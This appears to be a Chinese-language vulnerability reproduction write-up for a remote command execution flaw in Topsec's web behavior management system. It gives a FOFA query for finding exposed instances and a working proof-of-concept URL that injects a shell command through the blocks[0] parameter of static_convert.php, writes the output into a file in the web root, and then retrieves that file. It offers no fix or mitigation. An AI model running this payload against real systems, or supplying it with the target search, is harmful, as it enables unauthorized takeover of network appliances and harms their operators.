# 天融信上网行为管理远程命令执行漏洞

# 一、漏洞简介
天融信上网行为管理系统是天融信公司凭借多年来的安全产品研发经验，为满足各行各业进行网络行为管理和内容审计的专业产品。天融信上网行为管理系统存在命令执行漏洞，攻击者可利用该漏洞获取服务器控制权。

# 二、影响版本
+ fofa`app="天融信-上网行为管理系统"`
+ 登录页面

![1693205859079-207fa54f-ee37-4331-9621-44209c2001e0.png](./img/7241cfwepr_fRCyL/1693205859079-207fa54f-ee37-4331-9621-44209c2001e0-772323.png)

# 四、漏洞复现
1. 通过POC执行命令并将命令执行结果写入1.txt文件中

```plain
http://xx.xx.xx.xx/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20ls%20%3E%3E%20/var/www/html/1.txt%0A
```

![1693205959764-7d9f0d26-704b-4bdb-80be-d84a7d3ad7d3.png](./img/7241cfwepr_fRCyL/1693205959764-7d9f0d26-704b-4bdb-80be-d84a7d3ad7d3-832854.png)

2. 访问1.txt获取命令执行结果

```plain
http://xx.xx.xx.xx/1.txt
```

![1693205998150-b9502394-9f4a-469f-bcff-8ee18f5d597e.png](./img/7241cfwepr_fRCyL/1693205998150-b9502394-9f4a-469f-bcff-8ee18f5d597e-775050.png)



> 更新: 2024-02-29 23:57:15  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/itebo7lea2zxwow8>